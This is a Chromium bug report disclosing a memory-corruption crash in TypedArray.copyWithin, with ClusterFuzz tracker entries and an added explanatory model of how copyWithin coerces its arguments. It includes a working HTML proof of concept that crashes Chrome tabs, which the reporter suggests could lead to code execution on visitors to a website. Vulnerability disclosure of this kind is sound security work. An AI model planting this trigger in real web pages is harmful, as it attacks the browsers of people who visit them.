Security: Chrome TypedArray.copyWithin() Memory Corruption
Reported by pabster...@gmail.com, Oct 13 2016
Issue description
VULNERABILITY DETAILS
There is a memory corruption vulnerability in Chrome that can be triggered by using TypedArray.copyWithin in a way that will crash the tab, because of a crash in the Chrome Helper for that tab. It may be possible to exploit this vulnerability to perform arbitrary code execution on people who visit a website with the payload.
VERSION
Chrome Version: 53.0.2785.143
Operating System: Mac OS X 10.11.6
REPRODUCTION CASE
This could be used to execute code on a victim's machine when they visit your website. I attached a PoC with the necessary code to trigger this vulnerability. It is a memory corruption vulnerability. Just open the HTML file in Chrome and it will crash because of memory corruption. Note: Repeated exploitation of this bug causes the main Chrome process to crash because of a Segmentation Fault. Info attached.
HTML File:
<html>
<body>
<script>
// Backing store just under 2 GiB; the size is part of the trigger.
var q = new ArrayBuffer(2147479551);
var o = {valueOf : !true}; // unused by the PoC (valueOf is the boolean false, not a function)
var a = new Uint8Array(q);
// Deliberately non-numeric arguments: target = true, start = the array itself, end = true.
var d = a.copyWithin(true, a, true);
console.log(d);
</script>
</body>
</html>
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab
Client ID (if relevant): [see link above]
Crash ID 83a01800-e998-4a23-80b4-3fbfa7adafca
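The PoC passes booleans and the typed array itself as copyWithin's arguments, so it helps to know exactly what the engine is being asked to do. The following is an added example, not code from the report or from Chromium/V8: a spec-faithful model of how %TypedArray%.prototype.copyWithin normalises its arguments (ToIntegerOrInfinity, relative indices clamped to [0, len], count = min(final - from, len - to)), compared against the native implementation on a small constructed array so the PoC's argument shapes can be examined without allocating 2 GB. Function names and the six-byte sample array are this example's own.

```javascript
// Added example (not from the bug report): model of copyWithin argument
// coercion, checked against the engine's native copyWithin on small inputs.
// Function names and sample data are assumptions of this example.

// ToIntegerOrInfinity (ECMAScript 7.1.5), as applied to copyWithin's arguments.
function toIntegerOrInfinity(value) {
  const n = Number(value);           // ToNumber: true -> 1, objects go through ToPrimitive
  if (Number.isNaN(n)) return 0;     // NaN becomes +0
  if (!Number.isFinite(n)) return n; // +/-Infinity are kept as-is
  return Math.trunc(n);
}

// Relative index: negative values count from the end; result is clamped to [0, len].
function relativeIndex(value, len) {
  const i = toIntegerOrInfinity(value);
  return i < 0 ? Math.max(len + i, 0) : Math.min(i, len);
}

// The range copyWithin will actually move for a typed array of length `len`.
function copyWithinPlan(len, target, start, end) {
  const to = relativeIndex(target, len);
  const from = relativeIndex(start, len);
  const final = end === undefined ? len : relativeIndex(end, len);
  const count = Math.min(final - from, len - to);
  return { to, from, final, count };
}

// Reference implementation on a plain array; the temporary copy makes
// overlapping ranges behave like memmove, as the spec requires.
function referenceCopyWithin(arr, target, start, end) {
  const { to, from, count } = copyWithinPlan(arr.length, target, start, end);
  if (count > 0) {
    const src = arr.slice(from, from + count);
    for (let k = 0; k < count; k++) arr[to + k] = src[k];
  }
  return arr;
}

// Runs the native Uint8Array copyWithin and the reference on the same input.
function compare(values, target, start, end) {
  const native = Uint8Array.from(values).copyWithin(target, start, end);
  const ref = referenceCopyWithin(Array.from(values), target, start, end);
  return { native: Array.from(native), ref };
}

// The PoC's argument shapes on a six-byte constructed array instead of 2 GB.
// start === the array itself: ToNumber(a) -> ToPrimitive -> valueOf returns the
// object, so toString is used -> join -> "10,20,30,40,50,60" -> NaN -> 0.
// target and end are `true` -> 1. The PoC therefore asks for one byte to be
// copied from index 0 to index 1; the costly step is the join over every element.
function pocShapeDemo() {
  const a = new Uint8Array([10, 20, 30, 40, 50, 60]); // constructed sample
  const plan = copyWithinPlan(a.length, true, a, true);
  const result = compare(a, true, a, true);
  return { plan, joinedLength: String(a).length, ...result };
}

// Length of the string that coercing an all-zero typed array of `len` elements
// to a number must build first: one "0" per element plus len - 1 commas.
function zeroJoinLength(len) {
  return 2 * len - 1;
}

const POC_LENGTH = 2147479551; // ArrayBuffer size from the report
```

On the report's 2147479551-element zero-filled array the coercion of `start` alone implies a join of about 4.29 billion characters before any byte is copied. Whether the reported crash is in that coercion or in the copy itself is not established on this page; the model above only shows what the engine is asked to do.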
Oct 13 2016
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=6427931369013248
Oct 13 2016
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=4833281684275200
Oct 13 2016
Jan 19 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Comment 1 by pabster...@gmail.com, Oct 13 2016